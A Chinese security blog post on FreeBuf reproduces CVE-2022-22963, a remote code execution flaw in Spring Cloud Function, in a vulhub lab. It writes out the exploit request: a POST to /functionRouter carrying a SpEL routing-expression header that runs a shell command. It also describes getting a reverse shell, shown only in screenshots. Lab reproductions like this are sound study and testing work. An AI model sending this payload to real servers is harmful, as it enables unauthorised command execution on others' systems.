freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

漏洞复现CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
阜阳第一网络菜鸡 2022-08-08 14:08:26 219372
所属地 浙江省

0x00 实验环境

攻击机:192.168.172.128 #攻击机/反弹shell

靶场:vulhub搭建的靶场环境(192.168.172.128)

0x01 影响版本

3.0.0 <= Spring Cloud Function <= 3.2.2

0x02 漏洞复现

  1. 访问页面,默认页面:

1659935857_62f09c717868646fd4857.png!small

直接访问 http://192.168.172.128:8080/ 是一个错误页面

2. 漏洞复现

访问http://192.168.172.128:8080/fuctionRouter并且抓包,修改请求方式为POST,并且还要添加spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("要执行的命令"),由于无法回显,我这里执行的是创建一个文件,然后再到docker容器内部查看是否创建成功来确定是否成功执行了命令。

POST /functionRouter HTTP/1.1

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/RCE")

1659937281_62f0a201a9e02c0757929.png!small

进入到docker容器内部,docker-compose exec spring bash,发现创建成功

1659937399_62f0a27797f4d941d0c12.png!small

反弹shell

1659938585_62f0a719bac0a6d551cdc.png!small

成功收到反弹过来的shell

1659938650_62f0a75a29ce8a5d5adcd.png!small

在监听中成功接受到了shell

# 渗透测试 # web安全 # 漏洞挖掘 # 漏洞复现
本文为 阜阳第一网络菜鸡 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
阜阳第一网络菜鸡 LV.4
一个不知名的高中生
  • 10 文章数
  • 15 关注者
PHP代码审计0day复现
2023-09-07
003:JAVA数据类型讲解
2023-05-25
002:Java基础标识符和关键词
2023-04-18